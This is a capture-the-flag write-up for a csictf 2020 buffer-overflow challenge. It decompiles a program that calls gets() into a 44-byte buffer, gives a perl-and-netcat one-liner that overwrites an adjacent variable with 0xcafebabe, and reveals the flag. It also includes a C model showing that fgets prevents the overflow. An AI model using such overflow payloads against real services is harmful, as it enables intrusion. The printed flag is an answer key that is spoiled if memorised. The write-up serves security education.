Tags: bof pwn 

## Description

Travelling through spacetime!

```
nc chall.csivit.com 30007
```

## Analysis

Decompile with Ghidra. `main()` is very simple:

```c
undefined8 main(void)
{
  char local_38 [44];   /* 44-byte input buffer */
  int local_c;          /* checked below, never written by the program after init */

  local_c = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Welcome to csictf! Where are you headed?");
  gets(local_38);       /* no length limit: input can run past local_38 */
  puts("Safe Journey!");
  if (local_c == -0x35014542) {
    puts("You\'ve reached your destination, here\'s a flag!");
    system("/bin/cat flag.txt");
  }
  return 0;
}
```

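This is almost identical to the previous problem, except `local_c` has to be set to `-0x35014542`, which as a 32-bit two's-complement value is the same as `0xcafebabe`. `local_38` is 44 bytes and `local_c` sits directly after it on the stack, so just print `0xcafebabe` (as little-endian bytes) 12 times: the first 11 copies fill up `local_38` and the 12th overflows into `local_c`.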
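The layout arithmetic above and the bounded-read fix, as an added example that is not part of the original writeup or the challenge source: a struct models the two locals, and the same 48-byte input is read once the way `gets()` does and once the way `fgets(local_38, sizeof local_38, stdin)` would. The struct, the function names and a little-endian host are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of main()'s locals. Ghidra's names encode stack
 * offsets: local_38 at -0x38, local_c at -0xc, so 0x2c = 44 bytes apart. */
struct frame {
    char    local_38[44];
    int32_t local_c;
};

/* The writeup's input: 0xcafebabe as little-endian bytes, 12 times. */
static size_t build_line(char out[48]) {
    static const unsigned char word[4] = { 0xBE, 0xBA, 0xFE, 0xCA };
    for (size_t i = 0; i < 12; i++)
        memcpy(out + 4 * i, word, sizeof word);
    return 48;
}

/* Models gets(): the copy length comes from the input, not the buffer.
 * Clamped to the model struct so the demo itself stays in bounds. */
static int32_t read_like_gets(const char *line, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    memcpy(&f, line, len < sizeof f ? len : sizeof f);
    return f.local_c;
}

/* Models fgets(local_38, sizeof local_38, stdin): at most 43 bytes + NUL. */
static int32_t read_like_fgets(const char *line, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t n = len < sizeof f.local_38 - 1 ? len : sizeof f.local_38 - 1;
    memcpy(f.local_38, line, n);
    f.local_38[n] = '\0';
    return f.local_c;
}

int main(void) {
    char line[48];
    size_t n = build_line(line);
    printf("offset of local_c: %zu\n", offsetof(struct frame, local_c));
    printf("gets-style:  local_c = 0x%08x\n", (unsigned)read_like_gets(line, n));
    printf("fgets-style: local_c = 0x%08x\n", (unsigned)read_like_fgets(line, n));
    return 0;
}
```

With the bounded read, `local_c` stays 0 and the flag branch is unreachable from input alone.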

## Solution

```
kali@kali:~$ perl -e 'print "\xBE\xBA\xFE\xCA"x12 . "\n"' | nc chall.csivit.com 30007
Welcome to csictf! Where are you headed?
Safe Journey!
You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}
```

Original writeup (https://github.com/dobsonj/ctf/tree/master/writeups/2020/csictf/pwn_intended#pwn-intended-0x2).